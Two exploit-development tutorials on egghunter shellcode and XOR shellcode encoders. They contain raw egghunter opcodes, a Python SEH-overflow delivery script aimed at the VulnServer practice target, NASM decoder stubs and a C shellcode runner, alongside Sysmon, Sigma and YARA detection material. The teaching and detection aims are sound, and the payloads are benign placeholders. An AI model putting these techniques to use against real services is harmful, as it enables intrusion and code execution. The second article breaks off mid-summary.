Egghunters: Staged Payload Delivery When Buffer Space Is Tight

You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.

An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.

I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.


1. Why Egghunters Exist

The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.

The layout in memory looks like this:

  small overflow buffer (~32-60B)        elsewhere in the process
  +---------------------------+          +-----------------------------+
  | EGGHUNTER (the "hunter")  | --scan-> | w00tw00t + full shellcode   |
  +---------------------------+          +-----------------------------+
                                  finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:

  • At least ~32 reachable bytes to hold the hunter itself.
  • The full payload must already be in memory when the hunter executes.

That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.


2. The Page-Walk Problem

x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.

The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses — it jumps straight to the next page boundary and probes again. Inside a valid page it advances one DWORD at a time looking for the tag.

The brief table of moving parts:

ComponentDetail
Memory iterator registerEDX holds the current scan address
Page-boundary jumpOR DX, 0x0FFF → end of page; INC EDX → start of next page
Validity probeA syscall (or an SEH frame) tests whether the page is readable
Egg comparisonSCASD compares EAX to [EDI] and auto-increments EDI
Transfer to payloadJMP EDI once both halves of the egg match

Flowchart showing the egghunter page-walk loop: snapping EDX to page boundaries with OR DX 0x0FFF, probing validity via INT 0x2E, skipping on access violation, scanning with SCASD, and jumping to payload on egg match.
The egghunter skips entire 4 KB pages on access violations rather than crawling byte-by-byte, keeping scan time tractable across the full virtual address space.

3. Anatomy of the Syscall Egghunter

The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.

; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
    or   dx, 0x0fff        ; EDX -> last byte of current 4KB page
loop_inc_one:
    inc  edx               ; advance one byte (rolls into next page)
loop_check:
    push edx               ; save scan pointer (clobbered by syscall)
    push 0x2               ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
    pop  eax               ;   -> EAX = 0x2   *** verify per OS, see j00ru ***
    int  0x2e              ; legacy syscall gate
    cmp  al, 0x05          ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
    pop  edx               ; restore scan pointer
    je   loop_inc_page     ; bad page -> skip to next page boundary
is_egg:
    mov  eax, 0x74303077   ; "w00t"
    mov  edi, edx          ; EDI = current address
    scasd                  ; compare [EDI] to EAX, EDI += 4
    jnz  loop_inc_one      ; first half mismatch -> keep scanning
    scasd                  ; compare the *second* half of the egg
    jnz  loop_inc_one
matched:
    jmp  edi               ; EDI now points just past the doubled tag

Two SCASD instructions back to back are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg — exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically — only the syscall number differs.

IdentifierValue / Note
SyscallNtAccessCheckAndAuditAlarm
Syscall number (x86 XP–7)0x02
InvocationINT 0x2E
Access-violation status0xC0000005CMP AL, 0x05
Invalid-page actionJE loop_inc_page
Size~32 bytes

Syscall numbers are OS-version specific. 0x02 is stable on XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s table at j00ru.vexillium.org/syscalls/nt/64/ for your exact target build.


4. The SEH-Based Variant

Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.

; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
    push handler            ; EXCEPTION_REGISTRATION_RECORD.Handler
    push dword [fs:0]        ; .Next = current head of the SEH chain
    mov  [fs:0], esp         ; install our frame as the new chain head

    xor  edx, edx            ; scan pointer
scan_loop:
    inc  edx
    mov  edi, edx
    mov  eax, 0x74303077     ; "w00t"
    scasd                    ; read [EDI]; faults route into 'handler'
    jnz  scan_loop
    scasd                    ; confirm second half of the egg
    jnz  scan_loop
    pop  dword [fs:0]        ; restore previous SEH frame
    add  esp, 4
    jmp  edi                 ; transfer to payload
handler:                     ; entered on STATUS_ACCESS_VIOLATION
    ; bump saved EDX in the CONTEXT past the bad page,
    ; return ExceptionContinueExecution, resume scan_loop
    ret
FeatureSyscall variantSEH variant
Size~32 bytes~60 bytes
Validity checkINT 0x2ENtAccessCheckAndAuditAlarmCustom FS:[0] handler
OS portabilityFragile (syscall # changes)More portable
Detection surfaceINT 0x2E is glaringQuieter, but installs an SEH frame

That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.


Hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability.
The syscall hunter wins on size but loses on portability; the SEH hunter avoids hardcoded syscall numbers at the cost of roughly double the byte footprint and its own SEH-frame detection surface.

5. Egg Tags and Bad Characters

The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.

First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters\x00, \x0A, \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.

Second, and easy to forget: the tag must be unique in process memory ahead of the payload. If the 4-byte value appears anywhere before your real payload — including elsewhere in your own crafted buffer — the hunter may jump there first and execute garbage. Scan your buffer before sending:

def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
    payload_at = buffer.find(tag * 2)     # the real, doubled egg
    earlier    = buffer.find(tag)          # any earlier single hit?
    if earlier != -1 and earlier < payload_at:
        print(f"[!] tag {tag!r} appears at offset {earlier} "
              f"before the payload at {payload_at}")
        return False
    return True

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.

# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256))           # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10

Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.

The CS segment selector reveals the mode — 0x23 for 32-bit, 0x33 for 64-bit. The hunter checks it, then far-calls through FS:[0xC0] to cross into 64-bit code.

; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov  ebx, cs            ; read code-segment selector
    cmp  bl, 0x23           ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov  bl, 0xc0
    call dword [fs:ebx]     ; far call via FS:[0xC0] -> 64-bit mode
    cmp  al, 0x05           ; STATUS_ACCESS_VIOLATION low byte
    je   loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly — verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.


7. Wiring It Into an SEH Overflow

A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.

[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
   ... and the egg-tagged full payload lives in a SEPARATE field/request ...
#!/usr/bin/env python3
# LAB ONLY — staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket
RHOST, RPORT = "192.168.56.20", 9999

egghunter = (                       # 32-byte syscall hunter, tag "w00t"
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90"           # jmp +6 over the SEH record
seh  = b"\x42\x42\x42\x42"           # PLACEHOLDER pop/pop/ret (find per target)
egg  = b"w00tw00t"                   # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

trigger  = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))

with socket.create_connection((RHOST, RPORT)) as s:
    s.recv(1024)
    s.send(b"KSTET " + payload + b"\r\n")   # 1) stage the egg-tagged payload first
    s.send(b"KSTET " + trigger + b"\r\n")   # 2) THEN trigger overflow + run hunter
Flow diagram of a staged SEH overflow layout showing padding leading to nSEH short jump, SEH POP-POP-RET gadget, the egghunter in the constrained overflow buffer, and the egg-tagged full payload delivered separately in another request field.
The egg-tagged payload must arrive in a separate request before the overflow trigger is sent — reversing the order leaves the hunter scanning endlessly with nothing to find.

Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.


8. Lab: VulnServer KSTET

VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:

  1. Attach VulnServer in Immunity Debugger or x64dbg.
  2. Fuzz KSTET, find the offset to SEH control with a cyclic pattern.
  3. Locate a clean POP/POP/RET in a non-/SAFESEH, non-ASLR module.
  4. Generate the hunter with mona: !mona egg -t w00t (add -c to encode out bad chars). Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.
  5. Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg — this is the moment that makes the mechanism click.

Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.


9. Detecting Egghunter Behavior

The hunter is loud if you’re listening. Two behavioral tells lead:

  • A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
  • NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.
Event IDNameRelevance
1Process CreationBaseline parent-child chain for the vulnerable service
8CreateRemoteThreadEgg payload injecting; StartModule/StartFunction empty when the start address is outside loaded modules — a shellcode tell
10ProcessAccessCross-process handles requesting PROCESS_VM_WRITE (0x0020), PROCESS_VM_OPERATION (0x0008), PROCESS_CREATE_THREAD (0x0002)
25ProcessTamperingSysmon 13+; in-memory image diverging from disk — hallmark of in-memory execution

Default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of kernel32.dll exclusions — tune it before you rely on Event ID 8.

title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader
status: experimental
logsource:
  product: windows
  category: create_remote_thread     # Sysmon Event ID 8
detection:
  selection:
    StartModule: ''
    StartFunction: ''
  condition: selection
level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688 with command lines. And flag INT 0x2E in user mode wherever EDR or ETW lets you — it’s about as high-fidelity as indicators get.

YARA pins the syscall hunter’s opcode signature for memory forensics:

rule Egghunter_Syscall_x86 {
    meta:
        description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
        author = "GenXCyber"
    strings:
        $page_walk = { 66 81 CA FF 0F }   // or dx, 0x0fff
        $syscall   = { CD 2E }            // int 0x2e
        $av_check  = { 3C 05 }            // cmp al, 0x05
        $scasd     = { AF }               // scasd
    condition:
        all of them and (@syscall - @page_walk) < 32
}

10. Tools for Egghunter Analysis

ToolDescriptionLink
mona.pyGenerates/verifies egghunters (!mona egg) in Immunitycorelan.be
Immunity DebuggerClassic exploit-dev debugger, mona hostimmunityinc.com
x64dbgFree user-mode debugger for stepping the scanx64dbg.com
VulnServerSafe, intentionally vulnerable practice targetgithub.com
Process HackerSpot the 100% CPU thread and handle accessprocesshacker.sourceforge.io
SysmonEID 8/10/25 telemetry for shellcode behaviormicrosoft.com
j00ru syscall tableAuthoritative per-OS syscall numbersj00ru.vexillium.org
osed-scripts (epi052)Egghunter generator and OSED helpersgithub.com

11. Mitigations and Modern Reality

Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.

MitigationEffect on the technique
DEP / NXPayload on stack/heap won’t execute; primary kill switch for legacy targets
ASLRHardcoded POP/POP/RET addresses break; forces wider scans → more CPU and ETW noise
Control Flow GuardValidates indirect targets; disrupts the final JMP EDI when enforced
GS / stack canariesDon’t stop the hunter, but can stop the overflow that delivers it
App sandboxingLimits post-execution blast radius

The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.


12. MITRE ATT&CK Mapping

Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:

TechniqueMITRE IDDetection
Exploitation for Client ExecutionT1203Service crash/recover, EID 1 anomalies
Process InjectionT1055Sysmon EID 8/10, TI ETW
Process Injection: DLL InjectionT1055.001EID 8 with empty StartModule
Reflective Code LoadingT1620In-memory PE, EID 25 ProcessTampering
Obfuscated Files or InformationT1027Encoded egg payload, YARA on decoder stubs
Sandbox Evasion: Time BasedT1497.003CPU-spike artifact in sandboxes

Summary

  • An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
  • The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm/INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
  • The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core — a behavioral indicator in its own right.
  • Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
  • Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window — and mitigate upstream with DEP, ASLR, and CFG.

Related Tutorials

References

Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.


1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

ByteNameWhy it breaks things
\x00NULLTerminates C strings; strcpy/sprintf stop copying here
\x0aLine FeedRead as end-of-input by line-oriented protocols and gets
\x0dCarriage ReturnPaired with \x0a in HTTP/SMTP headers; often stripped
\x20SpaceToken delimiter in many parsers
\xff0xFFSentinel / length markers in some binary protocols

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).


2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A
AKA ⊕ K
000
011
101
110

There’s no key schedule, no S-box, no state to carry — which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in well under 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.

The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.


Flow diagram showing shellcode going through key search and XOR encoding, crossing a hostile transport layer, then being decoded by the stub and executed on the target
XOR encoding and decoding are symmetric operations — the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

  1. Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
  2. Drop it into the vulnerable buffer and dump the buffer from memory.
  3. Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
  4. Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(expected) != len(received):
        return min(len(expected), len(received)), "(truncated)", None
    return None

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the byte right before where the copy stopped is usually the terminator. Note it, exclude it, run again.


4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.


5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len silently truncates anything over 255 bytes, so a 300-byte payload decodes only its first 44 bytes and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, use the full mov ecx, payload_len and clear ECX with xor ecx, ecx first.

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:

/* LAB ONLY — disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */

#include <stdio.h>
unsigned char buf[] =
    "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
    "\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}
Flow diagram of the JMP-CALL-POP technique showing how a forward JMP reaches a CALL that pushes the payload address, POP captures it into ESI, and the decode loop XORs each byte before jumping into the now-decoded shellcode
JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax\x29\xc0, which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.


7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
decode_chunk:
    mov   al, [esi]            ; AL = key for this chunk
    inc   esi                  ; ESI -> first data byte
    xor   byte [esi], al       ; decode data byte 0
    inc   esi
    xor   byte [esi], al       ; decode data byte 1
    inc   esi
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; first decoded byte
SchemeProCon
Fixed single keySmallest stub; one xor per byteFails when bad-char set is dense
Per-chunk keySurvives tight bad-char setsLarger blob (one key byte per chunk); bigger stub

The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.


8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
    sub   esp, 0x200           ; reserve 512 bytes of scratch
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest — you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).


9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

  • Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
  • Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like fstenv [esp-0xc] to recover EIP without a tell-tale CALL — a deliberate jab at emulators that don’t model the FPU.

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.


10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

BehaviorWhat it reveals
Tight xor/inc/loop over a code regionClassic fixed-key decoder stub
Region transitions writable → executableDecoded payload about to run
Execution from unbacked memoryCode with no file on disk behind it

Sysmon Event IDs

Event IDNameRelevance
1Process CreationLoader/injector process spawn
7Image LoadedDLLs from temp/download paths into system processes
8CreateRemoteThreadThread created in another process — low-volume, high-signal
10ProcessAccessCross-process memory access; inspect GrantedAccess and CallTrace
25ProcessTamperingIn-memory image diverges from disk (hollowing / in-memory decode)

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.

ETW providers

ProviderPurpose
Microsoft-Windows-Threat-IntelligenceKernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs
Microsoft-Windows-Security-AuditingEvent ID 4688 process creation with command line
AMSIInspects script content after deobfuscation, before execution

Hardening

  • bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
  • Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
  • Code Integrity Guard (CIG) via ProcessSignaturePolicy — blocks unsigned image loads.
  • Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
  • Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

Hierarchy diagram showing behavioral indicators branching into RWX self-modifying memory and unbacked execution, each feeding into corresponding telemetry sources and hardening controls
Defenders shift focus from ever-changing encoded bytes to stable behavioral signals — self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

ToolDescriptionLink
NASMAssemble x86/x64 decoder stubsnasm.us
GDB + pwndbgSingle-step the decode loop, inspect ESI/ECXgdb.gnu.org
objdump / objcopyDisassemble stubs, extract .text bytesgnu.org
CapstoneProgrammatic opcode audit for bad charscapstone-engine.org
pwntoolsEncoder/exploit automation (pwnlib.encoders)docs.pwntools.com
pe-sieve / MonetaScan live processes for RWX / unbacked memorygithub.com
SysmonEndpoint telemetry for Event IDs 8, 10, 25learn.microsoft.com

12. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Obfuscated Files or InformationT1027Entropy/structure anomalies; encoded blob with decoder prefix
Encrypted/Encoded FileT1027.013Static scan for XOR-loop stub patterns near high-entropy data
Deobfuscate/Decode Files or InformationT1140Self-modifying memory; ACG violations; ETW VirtualProtect
Process InjectionT1055Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN
PE InjectionT1055.002Shellcode written into another process; RWX region creation
Reflective Code LoadingT1620Execution from unbacked memory; pe-sieve / Moneta

Summary

  • XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
  • The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
